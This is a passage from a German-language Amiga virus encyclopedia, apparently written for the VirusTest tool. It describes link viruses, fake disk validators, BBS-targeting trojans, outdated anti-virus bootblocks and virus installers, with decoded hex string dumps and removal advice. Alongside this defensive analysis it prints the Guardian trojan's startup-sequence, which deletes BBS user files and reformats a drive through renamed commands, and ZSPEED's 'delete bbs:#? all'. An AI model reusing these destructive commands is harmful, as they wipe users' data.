Linkteil zu lesen: 496e In 7374616c 6c657220 76312e33 20627920 staller v1.3 by 556e6974 65642046 6f726365 5320a931 United ForceS .1 39393600 633a6c6f 61647762 0000646f 996.c:loadwb..do 732e6c69 62726172 79000000 s.library... Sprung aus spatch in das Linkteil (auch mehrfach): - move 4.w,a6 (4 Bytes) wird zu bsr.w Linkteilstart (6100wxyz) - move.l 4,a6 (6 Bytes) wird zu bsr.w Linkteilstart + 1 NOP - Looptiefe $7FFF - RTS wird zu bra.s Linkteilstart+4 (60yz) - Looptiefe $7B + 4 (also anderer Vorgang als ZIB-Virus) Vermehrungsbedingungen: - c:loadwb wird gefunden (also SEHR gefaehrlich) - Medium validated - mind. #10 Block frei - usw. - Linkverlaengerung von loadwb um #1264 Bytes (also 4 Bytes mehr als ZIB-Virus) VT versucht das Linkteil aus spatch auszubauen. - ZIB-Virus File Link ab KS2.04: ja (cacheclear) Verbogener Vektor: LoadSeg Resetfest: Nein Fileverlaengerung: 1260 Bytes Link hinter den ersten Hunk. Decodiert (mit $BABE) ist im Linkteil zu lesen: 0003b090 4e757877 fdfc646f 732e6c69 ....Nuxw..dos.li 62726172 79006273 64736f63 6b65742e brary.bsdsocket. 6c696272 61727900 533a5a49 42006c69 library.S:ZIB.li Speicherverankerung: - LastAlert wird auf "TRSi" geaendert - LoadSeg wird verbogen - neuer Prozess wird erzeugt Name: ZIB - Es wird nach bsdsocket.library gesucht und falls vorhanden veraendert. Diese Lib liegt nicht in Libs,sondern wird von einigen Programmen (z.B. Miami) im Programm mitgefuehrt. Diese Lib wird immer nach Programmende (Miami) wieder aus dem Speicher entfernt, auch wenn Veraenderungen vorgenommen waren. (So war es auf meinem Testrechner). Vermehrungsbedingungen: - File ausfuehrbar ($3F3) - max. Filelaenge #125000 Bytes - min. Filelaenge keine Untergrenze gefunden - 3E9-Hunk wird gefunden - Medium validated - mind. 5 Block frei - RTS wird gefunden ( max. loop $3E+1 ) - RTS wird ersetzt durch bra.s oder NOP (falls RTS genau am Ende des ersten Originalhunks). Auch mehrere RTS - Versucht FileDate zu retten - Veraendert Word von Protection-LW Falls bsdsocket.lib im Speicher, dann versucht der ZIB-Process ueber das Modem eine Nachricht abzuschicken. VT versucht Loadseg im Speicher zurueckzusetzen. VT versucht das Linkteil aus einem File auszubauen. VT versucht den ZIB-Process aus dem Speicher zu entfernen. Besser waere aber ein Booten von einer sauberen Disk. - ZINE-Disk-Val. (L) File anderer moeglicher Name: DEVIL-ZINE Fundort z.B: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS Dringende Empfehlung: Loeschen Laenge: 1848 Bytes KEINE Verbogenen Vektoren NUR Bis KS1.3 einschl. Decodiert mit eori.b #$27,(A1)+ ist im File zu lesen: 20202020 20202020 20000941 46545343 ..AFTSC 4e550000 5a494e45 31303a2e 66617374 NU..ZINE10:.fast 64697200 20202020 20202020 20202020 dir. 20202020 20202020 20202020 20202000 . 46696c65 20537973 74656d00 00000000 File System..... 536e6f6f 70446f73 00000000 000003f2 SnoopDos........ Da die Routinen sehr kurz sind, sind danach noch Teile des Original-Disk-Validators zu finden, die aber NICHT erreicht werden. Ablauf: Test auf SnoopDos im Speicher Ja = Ende Nein Eor-Operation Danach soll LoadSeg ZINE10:.fastdir ausgefuehrt werden. CreateProc : Name FileSystem - ZINE-fastdir (L) File Dringende Empfehlung: Loeschen Laenge: 840 Bytes Liegt bei der Disk im Root-Verzeichnis KEINE verbogenen Vektoren KEINE Vermehrung Die Ursprungsfunktion von .fastdir wird nicht erfuellt. Fundort: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS Decodiert mit eori.b #$27,(a1)+ ist im File zu lesen: 5a494e45 31303a63 2f2e6661 73746469 ZINE10:c/.fastdi 72002020 20202020 20202020 20202020 r. 20202020 20202020 20202020 20200000 .. 74726163 6b646973 6b2e6465 76696365 trackdisk.device Da dieses File automatisch aktiviert wird, wenn der Disk-Val. unter KS1.3 gebraucht wird, wird zuerst das BitMapFlag auf #$FFFFFFFF gesetzt. Danach werden #$400 Bytes ueber das trackdisk.device nach #$6e000 (nur bei DD-disk=RootBlock) geschrieben. Danach wird die eor-Operation ausgefuehrt. Aufruf von DosExecute ZINE10:c/.fastdir Dieses Mal also ein fastdir in c . - ZINE-fastdir.BBS File VT bietet NUR Loeschen an. Laenge gepackt: 9800 Bytes Laenge entpackt: 16696 Bytes KEINE verbogenen Vektoren KEINE Vermehrung Die Ursprungsfunktion von .fastdir wird nicht erfuellt. Fundort: CD-LSD2:A/LEISURE/DISKMAGS/ZINE10.DMS Entpackt ist am Fileanfang zu lesen: 000003e9 00000b1b 4efa110a 42425300 ........N...BBS. 44483000 44483100 4844303a 00484431 DH0.DH1.HD0:.HD1 3a004448 30004448 31004844 30004844 :.DH0.DH1.HD0.HD 31004242 533a0044 48303a42 42532f00 1.BBS:.DH0:BBS/. 4448313a 4242532f 00484430 3a424253 DH1:BBS/.HD0:BBS 2f004844 313a4242 532f0044 48303a00 /.HD1:BBS/.DH0:. 4448313a 00484430 3a004844 313a0000 DH1:.HD0:.HD1:.. Es duerfte sich also um den Versuch handeln, Manipulationen in einer Mailbox vorzunehmen. Ob die Kette vom falschen Disk- Validator ueber root:.fastdir zu c/.fastdir komplett arbeitet, habe ich nicht nachvollzogen, da ich keine BBS fahre. Lesen Sie bitte auch nach bei: Devil_11_B.Door - ZINKO Trojan Zerstoerung Filename vielleicht: FlowerPower.exe L: 166992 Bytes VT bietet nur Loeschen an Vergleiche auch: VoxelSvind-Trojan Ablauf: Es wird ein Bild gezeigt: Dunkler breiter Diagonalbalken mit heller Schrift Iris presents Mit dem Text kann ich nichts anfangen. In Wirklichkeit werden auf sys: Veraenderungen vorgenommen. Schaden: An Files wird hinter 3F2 ein Textteil angehaengt mit variabler Laenge: 000003f2 5a494e4b 4f204d41 44452054 ....ZINKO MADE T 48495321 20492052 554c4521 20484148 HIS! I RULE! HAH 41484148 41484148 4121204e 4f525448 AHAHAHAHA! NORTH 45524e20 50414c41 43453a20 2b343520 ERN PALACE: +45 35383530 20363038 31005a49 4e4b4f20 5850 6081.ZINKO Verzeichnisse vorher: s/startup-sequence 7 13-09-95 devs/parallel.device 1812 13-09-95 devs/printer.device 26964 13-09-95 devs/printers/Nec 6732 13-09-95 devs/system-configuration 232 13-09-95 Verzeichnisse nachher: s/000000000111000110100001110011 18150 20-12-96 s/000000000110110100100111100000 6528 20-12-96 s/000000000110110011001101100100 2554 20-12-96 devs/000000000011000100101100111111 147 20-12-96 devs/000000000111010100001100000011 19202 20-12-96 devs/000000001000100100010100010111 3038 20-12-96 Es werden also nicht nur die Namen geaendert und Text an- gehaengt, sondern auch zwischen den Dirs hin und her kopiert. z.B. Keines der Files im veraenderten s-Dir ist die startup- sequence. Ich sehe hier keine Rettungsmoeglichkeit mit einem vernuenftigen Zeitaufwand. Sie koennen zwar leicht mit einem Filemonitor den Text abschneiden, aber nicht in jedem File ist ein ASCII-String, durch den Sie den Filenamen zuordnen koennen. Tut mir leid. - ZOMBI I-Virus Cool, im Prg DoIo, immer ab $7A000 fordert trackdisk.device NICHT Vermehrung: BB Schaeden: Sobald die Zaehlzelle den Wert $F erreicht hat: - RootBlock und Bitmapblock neu schreiben !!!! - Name der Disk dann: Zombi I - Textausgabe mit DisplayAlert Text wird decodiert nach $70000 mit eori.l #$AAAAAAAA,(A0)+ >>>>> Hello AMIGA User !!!!! <<<<< HERE IS ZOMBI I If you want to clean your Disks use Zombie I without risks ! Da der BitMapBlock immer nach $371 geschrieben wird, was aber im DOS nicht zwingend festgelegt ist, kann ein File, das beim Block $371 beginnt, zerstoert werden. Alle Hashwerte im Root- Block werden auf Null gesetzt. Beim BitMapTest erkennen Sie diese Disk am Namen Zombi I ab $1B0. Rettung: DiskSalv aufrufen. - ZonderKommando 1 File (Name nachvollziehbar) anderer Name: Mongo09 s.o. bekanntes File: mongo09.exe Gegen BBS gerichtet. Laenge gepackt : 1708 Bytes Laenge entpackt: 3368 Bytes Keine verbogenen Vektoren: Keine Vermehrung als Einbruchswerkzeug. Sucht nach Snoopdos Falls ja Ende Sucht nach ACP.STARTUP Falls nein Ende Legt File FLT_DSQ.DMS an (Das Hackfile=Daten ist codiert) VT bietet loeschen an. Fileauszug aus entpacktem File: 4eaefeda 4a806730 4cdf7fff 4e755a6f N...J.g0L..NuZo 6e646572 204b6f6d 6d616e64 6f203230 nder Kommando 20 3038202d 20546865 204e6577 2047656e 08 - The New Gen ;..... 51c8fffa 4e750000 00000000 533a4143 Q...Nu......S:AC 502e5354 41525455 50000000 00000000 P.STARTUP....... ;..... 00000000 00000000 0000434f 4e465f4c ..........CONF_L 4f43414c 2030322d 0075706c 6f61642f OCAL 02-.upload/ 464c545f 4453512e 444d5300 75736572 FLT_DSQ.DMS.user 2e646174 61004242 535f4c4f 43415449 .data.BBS_LOCATI 4f4e2000 00000000 00000000 00000000 ON ............. ;..... 00006262 733a636f 6e666967 30000000 ..bbs:config0... ;..... 00000000 00000000 536e6f6f 70446f73 ........SnoopDos - ZonderKommando 2 File (Name nicht nachvollziehbar aber ueber- nommen) anderer Name: Mongo51 s.o. Bekannte Files: mongo51.exe Laenge gepackt : 1464 Bytes Laenge entpackt: 2268 Bytes Keine verbogenen Vektoren: trsi-znt.exe Laenge gepackt : 21784 Bytes Laenge entpackt: 184552 Bytes Gegen BBS gerichtet Keine Vermehrung als Einbruchswerkzeug. Sucht nach Snoopdos Falls ja Ende Sucht nach Port ServerRP0 Falls nein Ende Sucht nach ACP.STARTUP Falls nein Ende Legt File ATX_NADA.DMS an (Passworte ???) VT bietet loeschen an. Fileauszug aus entpacktem File: 000751c8 fffa4e75 00000000 533a4143 ..Q...Nu....S:AC 502e5354 41525455 50000000 00000000 P.STARTUP....... ;..... 00000000 00000000 0000434f 4e465f4c ..........CONF_L 4f43414c 2030322d 0075706c 6f61642f OCAL 02-.upload/ 4154585f 4e414441 2e444d53 00757365 ATX_NADA.DMS.use 722e6461 74610042 42535f4c 4f434154 r.data.BBS_LOCAT 494f4e20 00000000 00000000 00000000 ION ............ ;..... 536e6f6f 70446f73 00536572 76657252 SnoopDos.ServerR 50300000 000003ec 0000004f 00000000 P0.........O.... - ZSPEED-Virus File Laenge ungepackt: 9556 gefunden in Archiv: XPRZSPEED.LHA 8703 Von der Definition kein Virus, da keine Vermehrung, sondern Zerstoerungs-File gegen AmiExpress (BBS). Also KEINE Gefahr fuer den Normal-User. Empfehlung: einfach loeschen UND s.seq aendern !!! lesbarer Textauszug am Fileende: 00000058 0000005A 06060000 5850522D ...X...Z....XPR- 53706565 64657220 56332E32 202D2041 Speeder V3.2 - A 43544956 45202D20 30343A31 33424253 CTIVE - 04:13BBS 64656C65 74652062 62733A23 3F20616C delete bbs:#? al 6C626273 3A446970 5F696E5F 44554445 lbbs:Dip_in_DUDE .... 4746412D 42415349 43000000 00000000 GFA-BASIC....... Versucht in doc zu taeuschen: This tool was coded in order to improve your Z-Modem transfers. And it works really good in 30 % of our TEST-Downloads there was an acceleration of nearly 6-7 % !!! Fileerkennung mit VT getestet : 08.10.92 WICHTIG: wird von VT im Speicher NICHT gefunden !!!!! Deshalb sollten Mailbox-Betreiber ab und zu in vt/listen/task suchen nach: $003ae000 wait process Background CLI [xprzspeedV3.2.exe] Schadensverlauf: - soll mit run gestartet werden - gibt dann im cli aus: XPR-Speeder V3.2 - ACTIVE - oeffnet nur einen Port OHNE Namen (deshalb auch keine Speichererkennung mit VT vgl. VT/Listen/Port) - wird um 04:13 Uhr (Nacht) aktiviert - delete bbs:#? all - holt delete (zumindest bei mir wird in Sys: danach gesucht) - loescht alle Files in bbs: - loescht ram:temp - legt Dip_in_DUDE neu an - vergroessert dieses File bis die Partition voll ist - dann ein System-Requester bbs voll - dieses File enthaelt bei mir nur Muell und die geloeschten Filenamen - erkannte Virenfinder: ===================== teilweise KickRomV1.2, haeufig mit Bootblock-Schreibzugriff, veraltet, resident, werden nach Abfrage geloescht - ABC-VKiller Empfehlung: sofort loeschen immer ab $7F400, KickTag im Prg. DoIo lila Bildschirm Im BB ist zu lesen: 20566972 75734b69 6c6c6572 2f446574 VirusKiller/Det 6563746f 72205631 2e303120 20202020 ector V1.01 41204142 43205072 6f647563 74696f6e A ABC Production - ACID Terminator V3.0 AntiVirusBB nicht fuer KS2.04 geeignet, da absolute Werte geschrieben werden. Empfehlung deshalb: loeschen - AmigaDOS Viruskiller V2.1 immer ab 7F3F0, resetfest verbiegt DoIo, KickTag, OpenOldLib, und im Prg OpenWindow Schreibt in CLI-Leiste AmigaDOS Viruskiller 2.1 meldet veraenderten Bootblock und bietet BB-AmigaDOS an. GURU mit KS2.04 deshalb Empfehlung loeschen - Anti-Virus_Boot V1.1 c1991 by Hoeppelsoft KickTag, KickMem, KickCheckSum bei Erstinstallierung: gruener Bildschirm bei Reset : Bildschirm mit blauen Streifen eigentlich harmlos, aber: verhindert bei mir mit KS2.04 booten von Festplatte Empfehlung deshalb : loeschen - ASS VirusProtector V1.0 (KickV1.2, Tonfolge) FastMem ja, KickTag, KickCheckSum, Vec5 Soll vor SCA schuetzen. VOELLIG ueberholt. Dringende Empfehlung; Loeschen Lesen Sie bitte auch VTkennt A-K DataLock Installer 6e6b7320 746f2074 68652041 53532056 nks to the ASS V 49525553 2050524f 54454354 4f522056 IRUS PROTECTOR V 312e3020 2a2a2a00 00000000 00000000 1.0 ***......... - Blizzard Protector V1.0 testet Cool, Vec3, falls veraendert wird ohne Warnung eigener BB geschrieben (verwendet dazu ueber den verbogenen CoolVector das andere Prg (jsr 82(a0)) Empfehlung: loeschen - BlizzPro V3.1 cool, Fastmem ja, im Prg. closedevice (oh, was neues) Vermehrung: ueber BB erkennt einige Viren, schreibt aber KS1.2 DoIo zurueck Meldung ueber DisplayAlert unverschluesselter Text im BB: BlizzPro V3.1 und Virennamen - BlizzPro V3.3 Cool gegenueber BlizzPro V3.1 verschoben NICHT mit KS2.04 kein Virus = Bildschirm gruen sonst s.o. unverschluesselter Text im BB: BlizzPro V3.3 und Virennamen Empfehlung: sofort loeschen - CLONK-Virus DoIo, KickMem, KickTag, KickCheckSum, SumKickData nur 512KB Chip (oder resetfestes 1MB), da zur Aktivierung immer ein Reset ausgefuehrt wird. (7D042 nach $80, TRAP 0) Ursprungsprogramm: Clonk! (Alcatraz) Clone: TAI10-CLONK-Virus s.o. - DISKGUARD v1.0 cool, im Prg DoIo, immer $7FA00 Vermehrung: ueber BB Meldung fremder BB.e: mit DisplayAlert schreibt immer DoIo von KS1.2, Folge: Guru mit KS1.3 Empfehlung: loeschen - Exterminator 2 cool, im Prg DoIo FastMem: nein KS2.04: nein Empfehlung deshalb: L=loeschen - H.C.S I veraendert cool, im Prg DoIo, loescht KickTag im Speicher immer ab $7EC00 Vermehrung: jeder DOS-BB ohne Warnung !!!! 4F4C4420 482E432E 5320414E 54492D56 OLD H.C.S ANTI-V 49525553 202D2048 2E432E53 20273432 IRUS - H.C.S '42 3230202A 2A2A0000 00607E2A 2A2A2042 20 ***...`~*** B - H.C.S II veraendert cool laenger als HCS1 erkennt einige alte BBViren ( Alertmeldung ) beim ersten Bootblockschreiberfolg wird noch der DoIo-Vector verbogen und bleibt verbogen bei leerem Laufwerk blinkt PowerLed - JoshuaKill.BB Cool, DoIo KS3.0: ja a)fordert trackdisk.device NICHT b)belegt bei Bedarf OHNE Check Speicher ab $7FF00 - Empfehlung deshalb: Loeschen Aufgaben: Testet Vektoren und sucht mit DoIo im BB nach Joshua. Mit DisplayAlert wird bei Bedarf ein Text ausgegeben. Joshua.BB wird ueberschrieben. Im BB ist u.a. zu lesen: THIS BOOTBLOCK IS NO VIRUS! IT KILLS JOSHUA VIRUS I+II! - Outlaw-VirusChecker keine Vermehrung, erkennt SCA. Schreibt aber immer KS1.2 Werte (z.B. Vec5 $fc12fc) zurueck. Folge: GURU mit KS1.3 nicht resident Empfehlung: loeschen - M&U V5.5 u. V6.1 KickTag, KickCheckSum immer $7F400 nach Reset auch DoIo, prueft die Standard-Vektoren und springt bei der Erstinstallation, falls diese nicht 0 sind, ins ROM zum Reset. Fehler: or.l $550(a6),d0 (richtig:$226) Stand: Feb. u. Maerz 90 Empfehlung deshalb: sofort loeschen - MemClear.BB Cool $7F0AE Keine Vermehrung, KS2.06: ja Empfehlung: Loeschen Setzt Reset-Vektoren auf Null und verbiegt dann Cool wieder Namensbegruendung: im BB uncodiert zu lesen 203e204d 656d6f72 79436c65 6172426f > MemoryClearBo 6f745631 2e323520 otV1.25 - Monkey-Killer AssProt-Clone Empfehlung loeschen s.o. Endlich hat es jemand geschafft den Text abzuaendern. Leider erkennt VT diesen BB weiterhin als ASS-Prot.BB . - N-STAR-Killer BB Empfehlung loeschen Testet Cool und KickTag auf 0 Falls ja blauer Hintergrund und weiter Falls nein ROM-Reset $FC0004 Keine verbogenen Vektoren Keine Vermehrungsroutine Datenschrott (falls vorhanden) hinter dem Text wird NIE erreicht. Version V1.7: 79002020 20202020 56312e37 20202020 y. V1.7 20205649 5255534b 494c4c45 52204652 VIRUSKILLER FR 4f4d2a2a 204e4f52 54482053 54415220 OM** NORTH STAR Version V2.0: 61727900 20202020 20205632 2e302020 ary. V2.0 20202020 56495255 534b494c 4c455220 VIRUSKILLER 46524f4d 2a2a204e 4f525448 20535441 FROM** NORTH STA 52202a2a 20202057 72697474 656e2062 R ** Written b - NO BANDIT soll ByteBandit am Bootblockbefall hindern Text: NO BANDIT ANYMORE! R.T. Empfehlung: loeschen - PayDay.BB Als AntiVirusBB gebaut Starfire2-Clone Dringende Empfehlung: Loeschen, da voellig veraltet. Namensbegruendung: Im BB ist zu lesen: PayDay !!! Cool $7EC0E, im Prg DoIo $7ECF0, im Speicher immer ab $7EC00 KS2.04: Guru 4 nach Reset Fordert trackdisk.device NICHT Ablauf: Testet auf DOS0-Kennung Testet jeweils 1 Langwort, z.B Band, fuer verschiedene BB-Viren. Falls eines gefunden wird, wird mit DisplayAlert ein Text aus- gegeben und das Schreiben des Payday-BBs angeboten. Ich rate dringend davon ab, da Probleme mit KS2.04 ent- stehen und nicht einmal 10 BB erkannt werden. - RedGhost-AV (L) Bootblock Verbogene Vektoren: KickTag und im Prg. DoIo Im Speicher immer ab $FF600 Soll ein AntivirusBB sein, ABER !!! - Fordert trackdisk.device NICHT DRINGENDE Empfehlung SOFORT Loeschen Im BB ist uncodiert zu lesen: 696f6e2e 6c696272 61727900 52656447 ion.library.RedG 686f7374 00556e6b 6e6f7700 4e6f7445 host.Unknow.NotE 78650056 69727573 0050726f 74656374 xe.Virus.Protect - Sherlock AntiVirenBB , Cool, DoIo, resident im Speicher, im Speicher immer ab 7FA00, benutzt zusaetzlich 7CA00, Textausgabe mit DisplayAlert schreibt bei mehr als 512KB BeginIo an falsche Stelle, Empfehlung: loeschen Hinweis: 04.03.92 (Brief) soll Disks zerstoeren. Getestet: nicht aufgetreten - SystemZ V3.0, 4.0, 4.1, 5.0, 5.1, 5.3, 5.4, 6.1, 6.3, 6.4, 6.5 KickTag, KickCheckSum, loescht Cool, im Prg. DoIo Melodie und Farbbalken ab 6.3 keine speicherabsolute Adresse mehr neuer Name Virusprotector (meldet sich vor Schreibzugriff) z.B. : 20535953 54454D20 5A205649 52555320 SYSTEM Z VIRUS 2050524F 54454354 4F522056 342E3020 PROTECTOR V4.0 - Trackers Antivirus V1.2 blauer Streifen, helle Schrift 2 alte absolute ROM-Einspruenge Empfehlung deshalb: sofort loeschen - TRACKERS-AV.BB (H) V3.0 harmlos roter Streifen, helle Schrift Testet Cool, Cold, KickTag also ein AntiVirus.BB KS 3.1 ja 68040 ja Bei Bedarf wird Loeschen oder Weiter mit Maustasten angeboten. Im BB ist zu lesen: 20544845 20545241 434b4552 532d414e THE TRACKERS-AN 54495649 52555320 56332e30 2021202d TIVIRUS V3.0 ! - - VERA File Filelaenge: #2472 Bytes Ein AntiVirusProgramm und KEIN (!!!!) Virus Verbogene Vektoren: Cold, BeginIo, Int5 Resetfest: ja Hat Probleme mit Cache: Im File ist zu lesen: 42814eae ff704e75 6000004c 20544845 B.N..pNu`..L THE 20564952 55532045 5241534f 52205632 VIRUS ERASOR V2 2e332028 56455241 29202d20 57524954 .3 (VERA) - WRIT 54454e20 42592042 4f444f20 53544945 TEN BY BODO STIE 474d414e 4e203139 38382000 00000000 GMANN 1988 ..... Es sollen Veraenderungen im Speicher erkannt werden und BB-Schreibzugriffe abgefangen werden. Das Programm macht NICHTS !!!! selbst, sondern oeffnet verschiedene Requester und ueberlaesst dem Anwender die Entscheidung. Da das Programm sehr alt (1988) ist, ist es natuerlich 1997 nicht mehr brauchbar. Sie sollten es nicht mehr verwenden. VT sollte das Teil im Speicher erkennen. - Vir.Prot.PB.BB (L) Dringende Empfehlung: Sofort Loeschen Soll Viren erkennen. Veraltet Verbogene Vektoren: Cold Cool DoIo 68030: Nach Reset GURU Im BB ist nur zu lesen: 62726172 79002050 6f776572 426f6f74 brary. PowerBoot Kann sich selbst als BB schreiben !!!! Fordert trackdisk.device nicht !!! Keine Unterscheidung Filesystem !!!! - VIRUS HUNTER Kicktag $7F300, KickCheckSum $7F307 immer ab $7F300 war ein AntiVirusBB fuer KS1.2 Empfehlung heute: sofort loeschen Begruendung: direkte RomEinspruenge jsr $FC06DC, $94(a6)=$FC12FC, schreibt nach $238(a6) dieser Teil wird aber seit KS2.04 genutzt !!! usw. - Virus-Killer KickMem, KickTag, KickCheckSum - VIRUS SLAYER V1.0 Cool, DoIo, im Speicher immer $7FA00 nur KS1.2 da DoIo absolut ROM veraltet, Empfehlung: loeschen Vermehrung: ueber BB Clone 21.01.94: Erzeugt mit TAI10-Inst. (s.o.) Nur ASCII-Text geloescht. Wird weiterhin als VirusSlayer erkannt: 2e202e2e 2e202e20 2e2e2e2d 202e2e20 . ... . ...- .. 2e2d2e20 2e2e2d20 2e2e2e21 2e2e2e20 .-. ..- ...!... 2e2d2d2e 202e2e2e 2e202e2e 202d2e20 .--. .... .. -. - XCOPY2-BB Empfehlung: Loeschen KS2.04 ja Fordert trackdisk.device NICHT KickTag, KickCheckSum, im Prg. DoIo, Speicherlage mit AllocMem Ablauf: Beim naechsten Reset wird der Bildschirm gruen. NUR wenn Sie beim Bootvorgang BEIDE Maustasten druecken, wird ein normaler BB geschrieben. Fuer mich ist das KEIN Virus, da OHNE das Wollen des Be- nutzers NICHTS passiert und nicht jeder die Tasten- kombination kennt. Namensbegruendung: Am Ende von Block 0 ist XCOPY2 zu lesen. Der Block 1 wird vom BB-Prg nicht benoetigt und mit 0 aufgefuellt. - ZVirusKiller V1.5 BB KickTag, KickCheckSum, veraltet Empfehlung: loeschen Text: ZViruskiller V 1.5 usw. - harmlose Programme: ???????? =================== - ANTI-Disk-Validator Laenge: 1848 Bytes in einen Disk-Validator von WB1.3 wurde das Wort ANTI ein- gebaut. Ueber diesen String wird mit bra.s hinweggesprungen. Die zusaetzlichen 8 Bytes werden wieder eingespart durch die Umwandlung von zwei Longs in Short im weiteren Programm. Dieses Programm ist harmlos. Um aber das Durcheinander bei den Disk-Validatoren gering zu halten, empfehle ich: LOESCHEN !!!!! Nachtrag Feb 94: Es ist ein Programm aufgetaucht, das so einen Anti-Disk-Validator schreibt (fragt aber erst nach). Da als Versionsnummer 1.7 angegeben wird, vermute ich, dass dieses Programm schon laenger existiert. Name: Bush Laenge gepackt: 7696 Bytes Laenge ungepackt: 13344 Bytes Dieses Programm wird in der Beschreibung als SADDAM-Killer vorgestellt. - PowerUp ein GagPrg. Laenge: 800 Bytes KEIN Virus !!!!!! keine verbogenen Vektoren. Kein Schreibzugriff Empfehlung: loeschen Ablauf: - nach dem Start wird ein PrgTeil decodiert mit eori.b #$AB,(a0)+ - in der shell erfolgt die Ausgabe: PowerUp ist installiert. Viel Spaß!!! - promptzeichen kommt NICHT - 1. Zeitschleife (dosDelay) laeuft an. - Ausgabe ueber AutoRequest Achtung! PowerUp wurde entfernt, da der Rechner zu heiß wurde. Neue Installation erst nach Abkühlung der Logik-Chips möglich! Oh, schade Oh, schade - Nach Mausklick immer noch kein prompt - 2. Zeitschleife laeuft an - DisplayAlert A P R I L , A P R I L !!! - Nach Mausklick erscheint Prompt-Zeichen - schaedliche Programme: ====================== - AcidInfector v1.5 File Loeschen Laenge gepackt: 1076 Bytes Laenge ungepackt: 1384 Bytes Fordert zur Installierung von BB-Viren auf. 68652041 6369642d 496e6665 63746f72 he Acid-Infector 20762031 2e350a0a 0d496e73 65727420 v 1.5...Insert 6469736b 20746f20 62652069 6e666563 disk to be infec 7465642c 20616e64 20707265 73732052 ted, and press R 65747572 6e3a0a0d 4572726f 72202d76 eturn:..Error -v 69727573 6e616d65 20646f65 73206e6f irusname does no Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen Sie bitte das File, bevor Sie es loeschen. - AmiExpress 3.20 Fake (17.01.94) Wird von VT NICHT erkannt !!!!! Soll mehrere Backdoors enthalten (Fremdaussage NICHT nachge- prueft !!! ). Fuer Nicht-Mailboxbetreiber ungefaehrlich. Und fuer die Mailboxbetreiber auch nur falls sie die Raubkopie installieren !!! Filename: ACP 45612 Bytes acp.info 1182 Bytes Express 212356 Bytes - BootblockMassacre gepackt: 9592 20202020 20202070 72657365 6e742069 present i 6e203139 3838203a 201b5b31 6d544845 n 1988 : .[1mTHE 20424f4f 54424c4f 434b204d 41535341 BOOTBLOCK MASSA 43524520 1b5b306d 0a202020 20202020 CRE .[0m....... Bietet install von verschiedenen alten BB-Viren (1988) Bietet install von TimeBomb V0.9 (Files) s.o. - BootShop Defjam: 108008 MasterCr: 67892 TetraPack: 74036 Dringende Empfehlung: Loeschen Erlaubt das Installieren von ueber 40 BB-Viren Hinweis: Erkennung in gepackter Form NICHT sicher (??). Testen Sie bitte das File, bevor Sie es loeschen. - BootShop.unp? Loeschen Jemand hat sich die Muehe gemacht und das BootShop-Prg ent- packt. Da absolut an eine Speicherstelle entpackt wird, ent- steht ein DATA-File, das NICHT zu starten ist !!! Sie sehen weder $3F3 noch $3E9 . Also kann dadurch KEIN BB verseucht werden. Sie erkennen eine Anzahl von Viren-BBen. Loeschen Sie das File. - BootX5.02 gibt es noch gar nicht (Stand:26.06.92) Jemand mit Filemonitorkenntnis hat mehrmals das Wort Porky eingebaut. Sofort loeschen - ByteWarriorCreater gepackt: 6012 Bytes (TNM) ungepackt: 7360 Bytes Erzeugt mit Fastmem eine NDOS-Disk Ohne Fastmem wird der ByteWarrior in den Bootblock geschrieben - DAG_Creator ungepackt: 7000 Bytes oder 7360 Bytes anderer Name: Infector V2.0 gepackt:4956 schreibt DAG-Virus in BB von df1: VT sollte die Version mit Laenge 7360 Bytes ungepackt erken- nen. - Disk.info Laenge: 370 Bytes KEINE Vermehrung Ein OriginalWB1.3-Icon wurde in der Struktur geaendert. (Text eingebaut z.B. This is a little present for all Lamers abroad ). Sobald Sie diese Disk einlegen und es muesste das Disk-Icon auf der WB angezeigt werden, stuerzt der Rechner ab. Haben Sie die Startup-Sequence im Cli abgebrochen, so muss kein Icon dargestellt werden und deshalb koennen Sie mit dieser Disk ohne Probleme arbeiten. Abhilfe: Ersetzen Sie Disk.info . - DiskRepair V2.6 Laenge:37740 Schreibt nach dem ersten Scandurchgang einen LEEREN RootBlock mit Namen PHOENIX . Beim 2. Durchgang werden aber dann die Files wieder eingetragen. ABER !!!!! es wird immer ein nicht ausfuehrbarer BootBlock geschrieben ??? Der Fehler liegt nach meiner Meinung im File bei $80d0 . Ich rate also von diesem Prg. ab !!! - DM-Trash 06.08.92 s.o. ZAPA_B.Door gegen AmiExpress ??? dm-tr.lha 5135 Bytes entpackt: dm-trash 4764 Bytes folgender Text (doc) ist enthalten: New virus ...caused by the new FIXED (?) Version of DMS 1.11 Turbo! It is some kind of linkvirus and uses Devices like DH0:, LIBS:, and BBS: (!!) usw. Eigene Versuche mit FangFiles (habe AmiExpress nicht) haben ergeben, dass eben von dm-trash folgende Files veraendert wer- den: bbs:config1 bbs:user.data bbs:user.key Die Files wurden verlaengert. dm-trash. Vermutlich soll ein Superlevel fuer einen Boxzu- gang geschaffen werden. Also fuer normale Amiga-User kein Problem. - Guardian.DMS sofort loeschen Nach dem Entpacken auf Disk entsteht guardian.config, startup-sequence und andere Files. Gefaehrlich: guardian.config v1.0 dh0:bbs/ v1.0 dh1:bbs/ 2 - v1.0 ist in c auf der Disk ein umbenannter delete-Befehl startup-sequence echo " " echo " GUARDIAN MULTITOOL INSTALL " echo " " echo "Please wait" v1.0 dh0:bbs/user.data v1.0 dh0:bbs/user.keys v1.0 dh0:bbs/config1 v1.0 dh0:s/startup-sequence check drive dh0: Name Guardian-Multi wait 3 echo " " echo "Operation complete " - check ist in c auf der Disk ein umbenannter format-Befehl - Infect Laenge ungepackt: 1384 schreibt File (z.B. BB) in BB eines LW's DFx kann sowohl positiv als auch negativ genutzt werden - Infector V2.0 = DAG_Creator s.o. - Keeper V2.0 gepackt: 34272 Bytes Hat einige Viren zum installieren FEST eingebaut. - Lhwarp_V1.40 Laenge: 47880 Bytes (ungepackt) Hinweis eines Users: mit Impl: 24788, mit PP: 27828 Schreibt bei mir auf Zieldisk, falsche DiskStruktur beim Entpacken. Disk dann unbrauchbar. Bitte fuehren Sie aber mit unwichtigen Disks selbst Tests durch und testen Sie mit BlockKette. - LZ 2.0 Hinweis: Stand 21.09.91 In Boxen ist ein LZ2.0 aufgetaucht, mit Laenge 37380 Bytes entpackt. Muss sich um einen Patch handeln und soll Archive zerstoeren. Hab ich, wird aber von VT nicht erkannt. Die hoechste OriginalVersionsNummer von LZ war am 22.09.91 LZ 1.92 . - Show Sysops Util 06.08.92 Laenge: 5780 entpackt: 7860 Sucht nach BBS:USER.DATA und gibt Daten am 